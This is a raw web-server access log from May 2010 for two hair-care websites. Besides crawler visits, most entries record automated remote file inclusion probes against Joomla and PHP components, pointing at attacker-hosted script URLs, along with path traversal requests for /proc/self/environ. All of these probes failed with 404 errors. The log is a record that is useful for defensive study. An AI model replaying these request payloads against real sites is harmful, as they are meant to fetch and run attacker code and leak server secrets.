91.192.168.241 - - [23/May/2010:17:00:09 -0700] "GET /logs/access_091214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:17:00:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13330 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.37.199.180 - - [23/May/2010:17:01:07 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:17:01:07 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:17:01:10 -0700] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:01:24 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:01:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:01:24 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:06 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:08 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:09 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:09 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:20 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:20 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:02:20 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:03:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:03:39 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:03:39 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.5.247 - - [23/May/2010:17:06:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:07:22 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:07:22 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.192.168.241 - - [23/May/2010:17:07:22 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:17:08:45 -0700] "GET /logs/access_100510.log//include/print_category.php?setup[use_category]=1&dir=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.5.247 - - [23/May/2010:17:09:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:30 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:30 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:30 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:40 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:40 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:40 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:46 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:46 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:09:46 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.161.92.51 - - [23/May/2010:17:11:05 -0700] "GET /bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.161.92.51 - - [23/May/2010:17:11:06 -0700] "GET /logs/access.log//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.161.92.51 - - [23/May/2010:17:11:06 -0700] "GET /logs//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:11:11 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:12:10 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.192.168.241 - - [23/May/2010:17:12:15 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.36.5.247 - - [23/May/2010:17:13:56 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.36.5.247 - - [23/May/2010:17:13:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.36.5.247 - - [23/May/2010:17:13:56 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:17:15:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5547 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
69.36.5.247 - - [23/May/2010:17:17:17 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.36.5.247 - - [23/May/2010:17:17:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.36.5.247 - - [23/May/2010:17:17:17 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
220.181.94.213 - - [23/May/2010:17:25:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [23/May/2010:17:25:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14546 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
220.181.94.213 - - [23/May/2010:17:25:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13614 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
220.181.94.213 - - [23/May/2010:17:25:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12869 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:17:36:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4396 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:17:43:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8280 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:17:49:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13528 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.111.220 - - [23/May/2010:17:53:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.111.220 - - [23/May/2010:17:53:03 -0700] "GET /logs/?S=A HTTP/1.0" 200 5498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
72.161.92.51 - - [23/May/2010:17:53:59 -0700] "GET /logs/access_100125.log//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.161.92.51 - - [23/May/2010:17:53:59 -0700] "GET /bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.161.92.51 - - [23/May/2010:17:54:00 -0700] "GET /logs//bbs/skin/zero_vote/write.php?dir=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:17:55:01 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12140 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:18:01:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18766 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.7.41 - - [23/May/2010:18:05:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13537 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:06:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
69.90.47.83 - - [23/May/2010:18:07:57 -0700] "GET /logs/access_100510.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.90.47.83 - - [23/May/2010:18:07:58 -0700] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.90.47.83 - - [23/May/2010:18:07:58 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.90.47.83 - - [23/May/2010:18:14:58 -0700] "GET /logs/access_100208.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.111.220 - - [23/May/2010:18:15:21 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:16:24 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.94.229 - - [23/May/2010:18:20:00 -0700] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [23/May/2010:18:20:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
69.90.47.83 - - [23/May/2010:18:24:20 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.90.47.83 - - [23/May/2010:18:24:21 -0700] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.90.47.83 - - [23/May/2010:18:24:21 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:18:26:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13770 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:28:27 -0700] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:28:27 -0700] "GET /logs/access_100118.log%20%20////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:28:28 -0700] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.160.141.237 - - [23/May/2010:18:29:21 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.160.141.237 - - [23/May/2010:18:29:21 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
173.160.141.237 - - [23/May/2010:18:29:21 -0700] "GET /logs/access_100322.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:29:30 -0700] "GET /logs/access_091228.log%20%20////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.72.137 - - [23/May/2010:18:30:05 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.72.137 - - [23/May/2010:18:30:05 -0700] "GET /logs/access_100322.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.72.137 - - [23/May/2010:18:30:05 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.mainviolin.com/images/.log/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:31:09 -0700] "GET /logs/access.log%20%20////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:31:09 -0700] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:31:10 -0700] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:31:30 -0700] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:31:30 -0700] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:31:30 -0700] "GET /logs/access.log////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:31:49 -0700] "GET /logs/access_100125.log////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.109.245.55 - - [23/May/2010:18:32:20 -0700] "GET /logs/access.log////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:32:20 -0700] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.109.245.55 - - [23/May/2010:18:32:20 -0700] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://reconer.110mb.com/z1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.204.130 - - [23/May/2010:18:33:31 -0700] "GET /logs/access_091123.log%20%20//modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [23/May/2010:18:33:31 -0700] "GET /modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [23/May/2010:18:33:31 -0700] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:34:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:34:39 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:34:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:34:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5674 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
218.149.84.14 - - [23/May/2010:18:34:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:34:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:34:44 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.133.204.130 - - [23/May/2010:18:35:01 -0700] "GET /logs/access_091207.log%20%20//modules/cjaycontent/admin/editor2/errors.php?error=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:52 -0700] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:52 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:55 -0700] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:35:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:36:12 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:36:14 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:38:12 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:38:14 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:38:40 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [23/May/2010:18:38:42 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:18:40:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5474 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
